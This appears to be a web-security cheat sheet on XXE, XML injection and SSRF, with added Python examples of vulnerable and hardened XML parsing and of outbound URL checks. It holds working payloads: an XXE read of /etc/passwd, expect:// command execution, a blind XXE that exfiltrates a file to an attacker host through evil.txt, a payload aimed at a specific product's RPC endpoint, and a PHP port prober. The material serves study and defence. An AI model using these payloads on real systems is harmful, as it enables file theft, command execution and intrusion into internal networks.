XML External Entity (XXE) Processing
Accessing local resources (on libxml2 2.9 and later, simplexml_load_string() only expands the external entity when the LIBXML_NOENT option is passed):

```php
<?php
$xml = <<<XML
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
XML;
// Intentionally vulnerable: the external entity is expanded, so the parsed
// document carries the contents of /etc/passwd.
$data = simplexml_load_string($xml);
print_r($data);
?>
```
Remote code execution (requires the PHP expect extension, which registers the expect:// stream wrapper):

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "expect://id" >
]>
<creds>
  <user>&xxe;</user>
  <pass>mypass</pass>
</creds>
```
Probing the internal network (the parser makes the HTTP request from the server; a timeout, error or echoed response tells you whether the host and port are reachable):

```xml
<?xml version="1.0" ?>
<!DOCTYPE ANY [
  <!ENTITY xxe SYSTEM "http://192.168.1.2:8080/data" >
]>
<foo>&xxe;</foo>
```
Tag Injection
Content injection
Blind XXE
Nested remote entities: the parameter entity %remote; pulls evil.txt from the attacker's host; evil.txt declares %all;, which in turn declares %send;, whose SYSTEM URI carries the contents of %file; to the attacker's 1.php (the contents travel in the query string, so they must be URL-safe):

```xml
<?xml version="1.0"?>
<!DOCTYPE ANY[
  <!ENTITY % file SYSTEM "file:///C:/1.txt">
  <!ENTITY % remote SYSTEM "http://192.168.150.1/evil.txt">
  %remote;
  %all;
  %send;
]>
```
evil.txt

```xml
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.150.1/1.php?file=%file;'>">
```
Testing for XML Injection
Break the XML syntax so that the parser errors out.
If `&` is not itself encoded as `&amp;`, it can be used to test for XML injection.
https://github.com/xmendez/wfuzz/
Example

```http
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true

__type=updateData&__viewInstanceId=dorado.tabselfservice.FindBackStaticPWSvNewForReset~dorado.common.BaseViewModel&__xml=<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:////test" >]><foo>&xxe;</foo>&1518403736067
```
Payload with echoed output (`%26` is the URL-encoded `&`, because the XML travels inside a form parameter):

```xml
<!DOCTYPE ANY[ <!ENTITY xxe SYSTEM "/">]>
<rpc method="noteInputCount">
  <ps>
    <p name="user_code">1</p>
  </ps>
  <vps>
    <p name="DEFAULT_DATA_SOURCE">%26xxe;</p>
  </vps>
</rpc>
```
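The following is an added example, not code from the original post, written in Python on the standard-library expat parser rather than PHP/libxml so it runs anywhere. `parse_unsafe` resolves external general entities the way the simplexml example above does (only `file://` is implemented; `expect://` and `http://` would be further resolvers), `parse_safe` rejects any DOCTYPE outright, and `embed_untrusted` shows the `&amp;` encoding that the XML injection test above relies on being absent. The names `xxe_payload`, `parse_unsafe`, `parse_safe`, `is_rejected`, `embed_untrusted`, `demo_file_read` and the `FAKE_PASSWD` contents are all hypothetical, constructed for this example.

```python
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import unquote, urlsplit
from xml.sax.saxutils import escape

# Constructed stand-in for /etc/passwd so the demo never touches the real file.
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"


class DtdForbidden(ValueError):
    """Raised by the hardened parser when the input carries a DOCTYPE."""


def xxe_payload(system_uri: str) -> str:
    """The local-file payload from the post, parameterised on the SYSTEM URI (hypothetical helper)."""
    return (
        '<?xml version="1.0"?>'
        "<!DOCTYPE foo [ <!ELEMENT foo ANY > "
        f'<!ENTITY xxe SYSTEM "{system_uri}" >]>'
        "<foo>&xxe;</foo>"
    )


def parse_unsafe(xml_text: str) -> str:
    """Vulnerable parser: external general entities are resolved, and file:// is read from disk.
    Returns the concatenated character data of the document."""
    chunks = []
    parser = expat.ParserCreate()

    def fetch_external(context, base, system_id, public_id):
        parts = urlsplit(system_id)
        if parts.scheme != "file":
            return 1  # expect:// and http:// are not implemented here; entity is skipped
        with open(unquote(parts.path), "rb") as f:
            body = f.read()
        # The child parser inherits the parent's handlers, so the file's bytes
        # are delivered to CharacterDataHandler exactly like document text.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return "".join(chunks)


def parse_safe(xml_text: str) -> str:
    """Hardened parser: a DOCTYPE (and so every entity declaration) is rejected before
    any entity can be declared, which covers local files, expect:// and blind/OOB variants."""
    chunks = []
    parser = expat.ParserCreate()

    def reject_doctype(*_):
        raise DtdForbidden("DOCTYPE declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return "".join(chunks)


def is_rejected(xml_text: str) -> bool:
    try:
        parse_safe(xml_text)
    except DtdForbidden:
        return True
    return False


def embed_untrusted(value: str) -> str:
    """XML injection guard: '&' and '<' in user input are escaped before the value is
    placed into an element, so an injected '&xxe;' stays literal text."""
    return f'<p name="DEFAULT_DATA_SOURCE">{escape(value)}</p>'


def demo_file_read() -> str:
    """Write the fake passwd file, aim the payload at it, and parse with the vulnerable parser."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(FAKE_PASSWD)
    try:
        return parse_unsafe(xxe_payload("file://" + path))
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_file_read())
    print(is_rejected(xxe_payload("file:///etc/passwd")))
```

The safe variant refuses the DOCTYPE rather than trying to filter individual entity declarations; a parser that has no DTD to process cannot be talked into fetching anything, which is the same effect as leaving LIBXML_NOENT off in PHP.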
SSRF (Server-Side Request Forgery)
Internal network port probing

```php
<?php
// Assumed for this example: the target host and port are taken straight from
// the request, which is the SSRF sink.
$host = $_GET['host'];
$port = $_GET['port'];
if (!$fp = fsockopen($host, intval($port), $errno, $errstr, 5)) {
    echo "$errno $errstr\n";
} else {
    echo "Port open.\n";
    if ($fp) {
        fclose($fp);
    }
}
?>
```
```php
<?php
// Server-side fetch with curl; with an attacker-controlled URL this becomes an SSRF.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.example.com/");
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
?>
```
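As an added example (not code from the original post), here is the destination check a server-side fetcher needs before either of the PHP snippets above is allowed to connect: it refuses non-HTTP schemes, credentials in the URL, and any host that resolves to a loopback, private, link-local or otherwise non-global address, including the IPv4-mapped IPv6 and hex-IP spellings used to dodge naive blocklists. `check_outbound_url`, `is_public_address`, `system_resolver` and `constructed_resolver` are hypothetical names; `CONSTRUCTED_DNS` is a made-up lookup table so the checks run offline (its 0x7f000001 entry mirrors what libc's inet_aton would produce).

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> list:
    """Resolve with the OS resolver (used at runtime; needs DNS)."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


# Constructed stand-in for DNS so this example runs offline.
CONSTRUCTED_DNS = {
    "www.example.com": ["93.184.216.34"],
    "internal.corp": ["10.0.0.5", "93.184.216.34"],  # one private answer is enough to reject
    "0x7f000001": ["127.0.0.1"],  # hex spelling of 127.0.0.1, as inet_aton parses it
}


def constructed_resolver(host: str) -> list:
    return CONSTRUCTED_DNS.get(host, [])


def is_public_address(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 is really 10.0.0.1
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url: str, resolver=system_resolver):
    """Return (allowed, reason) for a URL the server is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP: no lookup needed
    except ValueError:
        # Names, and also odd spellings such as 0x7f000001 or 2130706433 that
        # ipaddress rejects but the libc resolver happily turns into 127.0.0.1.
        addresses = resolver(host)
    if not addresses:
        return False, f"{host!r} did not resolve"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host!r} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://www.example.com/", "http://192.168.1.2:8080/data",
                      "http://[::ffff:10.0.0.1]/", "http://0x7f000001/"):
        print(candidate, check_outbound_url(candidate, constructed_resolver))
```

The check is only half the fix: the name is resolved once here and again when the client connects, so a rebinding DNS answer can pass the check and then point at 127.0.0.1. Connect to the address that was checked (with curl, CURLOPT_RESOLVE pins it), and either disable CURLOPT_FOLLOWLOCATION or re-run the check on every redirect target.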
XPath injection
XPath uses path expressions to select nodes or node sets from an XML document.